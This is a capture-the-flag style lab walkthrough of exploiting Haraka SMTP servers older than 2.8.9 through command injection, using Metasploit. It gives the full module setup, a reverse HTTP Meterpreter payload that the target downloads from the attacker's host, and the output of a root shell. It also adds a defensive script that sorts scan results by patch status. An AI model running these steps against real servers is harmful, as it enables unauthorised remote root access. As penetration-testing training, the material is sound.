Exploiting A Vulnerable SMTP Server
Exploiting SMTP
SMTP (Simple Mail Transfer Protocol) is a communication protocol used for the transmission of email.
SMTP uses TCP port 25 by default. It can also be configured to run on TCP ports 465 and 587.
Haraka is an open source, high performance SMTP server developed in Node.js.
The Haraka SMTP server comes with a plugin for processing attachments. Haraka versions prior to 2.8.9 are vulnerable to command injection through that plugin.
Demo: Exploiting A Vulnerable SMTP Server
Be aware that you may come across SMTP servers configured to run on the other ports, namely 465 and 587.
Check the IP address of the attacker machine first:
ifconfig
eth1: inet 192.86.51.2
Make sure the PostgreSQL database service is started so that Metasploit can use its database.
service postgresql start
Start up the MSF console.
msfconsole
Create a new workspace.
workspace -a haraka
Set the global variable for the RHOSTS option.
setg RHOSTS 192.86.51.3
Set the global variable for the lowercase rhost option as well, since the Haraka module uses rhost rather than RHOSTS.
setg rhost 192.86.51.3
Perform an Nmap scan on the target server to identify where SMTP is currently running, and to verify that a vulnerable version of Haraka is running on the target.
We'll do this by running the scan from within the MSF console, using the db_nmap command.
-sV: perform service and version detection.
-O: perform operating system detection.
db_nmap saves all of the Nmap scan results into the MSF database, so we can analyze the results whenever we want to.
db_nmap -sV -O 192.86.51.3
Search for the Haraka exploit module, load it, and list its options.
search type:exploit name:haraka
use exploit/linux/smtp/haraka
show options
We need to set a few important options: the server host (SRVHOST), the server port (SRVPORT), and the recipient address (email_to), which must be accepted by the target server.
The first option that we want to set is the server port (SRVPORT), which we will set to port 9898.
set SRVPORT 9898
Set the email_to option.
set email_to root@attackdefense.test
Set the payload that we want executed on the target system once the exploit is run.
Instead of a staged payload, we are going to use a non-staged payload.
set payload linux/x64/meterpreter_reverse_http
show options
We then need to set the LHOST option to our own IP.
The reason we changed the server port (SRVPORT) to 9898 is that this payload's handler listens on port 8080 (LPORT) by default, and the module's HTTP server would otherwise collide with it.
Set LHOST to the IP address of the eth1 interface.
set LHOST eth1
run
This is a non-staged, or stageless, payload.
The kernel version is 5.4.0.
meterpreter > sysinfo
Get our current privileges by typing getuid, which enumerates our permissions on the target system.
We get a user id of 0, meaning we have root access, the highest privilege level on the Linux target; consequently we do not need to perform privilege escalation.
meterpreter > getuid
That is how to exploit an SMTP server. And in this case, we have explored the process of exploiting the Haraka SMTP server.
Vulnerable SMTP Server
Overview
The target server as described below is running a vulnerable SMTP service. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a shell on the target!
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-715.pdf
My own approach
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.58.156.2 netmask 255.255.255.0 broadcast 192.58.156.255
ether 02:42:c0:3a:9c:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.58.156.3
root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a haraka
[*] Added workspace: haraka
[*] Workspace: haraka
msf5 > setg RHOSTS 192.58.156.3
RHOSTS => 192.58.156.3
msf5 > setg rhost 192.58.156.3
rhost => 192.58.156.3
msf5 > db_nmap -sV -O 192.58.156.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-04 12:35 UTC
[*] Nmap: Nmap scan report for target-1 (192.58.156.3)
[*] Nmap: Host is up (0.000025s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 25/tcp open smtp Haraka smtpd 2.8.8
[*] Nmap: MAC Address: 02:42:C0:3A:9C:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/4%OT=25%CT=1%CU=31202%PV=N%DS=1%DC=D%G=Y%M=0242C0%TM
[*] Nmap: OS:=63DE5126%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%TI=Z%CI=Z%II=I%
[*] Nmap: OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
[*] Nmap: OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
[*] Nmap: OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
[*] Nmap: OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
[*] Nmap: OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
[*] Nmap: OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
[*] Nmap: OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
[*] Nmap: OS:%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: victim-1
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.16 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.58.156.3 25 tcp smtp open Haraka smtpd 2.8.8
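The scan above is what a defender would also use to find hosts that still need the 2.8.9 fix. The following is an added example, not code from the original post or from the Haraka project: it parses Nmap-style service lines like the one in the output above, compares the reported version numerically against 2.8.9, and flags each Haraka listener as vulnerable, patched, or unknown. The sample lines other than the first are constructed; the regex assumes the "Haraka smtpd X.Y.Z" format Nmap printed here.

```javascript
// Added example (not part of the original post or of Haraka): triage scan
// output for Haraka listeners older than 2.8.9, the first version with the
// attachment-plugin command injection fixed, so hosts needing a patch stand out.
const FIXED_VERSION = '2.8.9'; // first unaffected version, as stated in the post

// Parse "major.minor.patch" into a numeric triple; null if malformed.
function parseVersion(text) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(text.trim());
  return m ? m.slice(1, 4).map(Number) : null;
}

// Numeric comparison: negative if a < b, 0 if equal, positive if a > b.
// A plain string comparison would wrongly rank "2.8.10" below "2.8.9".
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// Extract port and version from an Nmap/db_nmap service line such as
// "[*] Nmap: 25/tcp open smtp Haraka smtpd 2.8.8". Returns null for
// anything that is not a Haraka SMTP service.
function parseHarakaServiceLine(line) {
  const m = /(\d+)\/tcp\s+open\s+smtp\s+Haraka smtpd(?:\s+(\d+\.\d+\.\d+))?/.exec(line);
  if (!m) return null;
  return { port: Number(m[1]), version: m[2] || null };
}

// Classify one line as vulnerable, patched, or unknown (no version reported).
function classifyHaraka(line) {
  const svc = parseHarakaServiceLine(line);
  if (!svc) return null;
  if (!svc.version) return { port: svc.port, version: null, status: 'unknown' };
  const status =
    compareVersions(parseVersion(svc.version), parseVersion(FIXED_VERSION)) < 0
      ? 'vulnerable'
      : 'patched';
  return { port: svc.port, version: svc.version, status };
}

// Run the classifier over a batch of lines, dropping non-Haraka services.
function triage(lines) {
  return lines.map(classifyHaraka).filter(Boolean);
}

// Constructed sample input: the first line is the post's own scan result,
// the rest are made up to exercise the patched, "2.8.10" and unknown cases.
const SAMPLE_LINES = [
  '[*] Nmap: 25/tcp open smtp Haraka smtpd 2.8.8',
  '587/tcp open smtp Haraka smtpd 2.8.9',
  '465/tcp open smtp Haraka smtpd 2.8.10',
  '25/tcp open smtp Haraka smtpd',
  '22/tcp open ssh OpenSSH 7.6p1',
];

console.log(JSON.stringify(triage(SAMPLE_LINES), null, 2));
```

The "unknown" status is deliberate: a listener that hides its version is not evidence of being patched, and should be checked by other means (package version on the host) rather than treated as safe.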
Haraka SMTP Command Injection
The Haraka SMTP server comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection
msf5 > search type:exploit name:haraka
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection
msf5 > use exploit/linux/smtp/haraka
msf5 exploit(linux/smtp/haraka) > show options
Module options (exploit/linux/smtp/haraka):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
email_from foo@example.com yes Address to send from
email_to admin@localhost yes Email to send to, must be accepted by the server
rhost 192.58.156.3 yes Target server
rport 25 yes Target server port
Exploit target:
Id Name
-- ----
0 linux x64
msf5 exploit(linux/smtp/haraka) > set SRVPORT 9898
SRVPORT => 9898
msf5 exploit(linux/smtp/haraka) > set email_to root@attackdefense.test
email_to => root@attackdefense.test
msf5 exploit(linux/smtp/haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf5 exploit(linux/smtp/haraka) > show options
Module options (exploit/linux/smtp/haraka):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 9898 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
email_from foo@example.com yes Address to send from
email_to root@attackdefense.test yes Email to send to, must be accepted by the server
rhost 192.58.156.3 yes Target server
rport 25 yes Target server port
Payload options (linux/x64/meterpreter_reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 linux x64
msf5 exploit(linux/smtp/haraka) > set LHOST eth1
LHOST => 192.58.156.2
msf5 exploit(linux/smtp/haraka) > run
[*] Started HTTP reverse handler on http://192.58.156.2:8080
[*] Exploiting...
[*] Using URL: http://0.0.0.0:9898/Bb0IKR
[*] Local IP: http://10.1.0.9:9898/Bb0IKR
[*] Sending mail to target server...[*] Client 192.58.156.3 (Wget/1.17.1 (linux-gnu)) requested /Bb0IKR
[*] Sending payload to 192.58.156.3 (Wget/1.17.1 (linux-gnu))
[*] http://192.58.156.2:8080 handling request from 192.58.156.3; (UUID: 8x0uh6dc) Redirecting stageless connection from /b0mPpDj0kMkezhjMfRBK-QNBNU9ewCJOCf5UEoh5pheMyNja4_0QoWFmpocWIC_S9U
XIRs-xTMwjS-KYEOcUA31HzfkS18tpYiAsd1xgHz4kD_G1eAPTkDfNC with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.58.156.2:8080 handling request from 192.58.156.3; (UUID: 8x0uh6dc) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.58.156.2:8080 -> 192.58.156.3:41222) at 2023-02-04 12:48:55 +0000
[+] Triggered bug in target server (plugin timeout)
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.58.156.3
OS : Ubuntu 16.04 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
Haraka < 2.8.9 - Remote Command Execution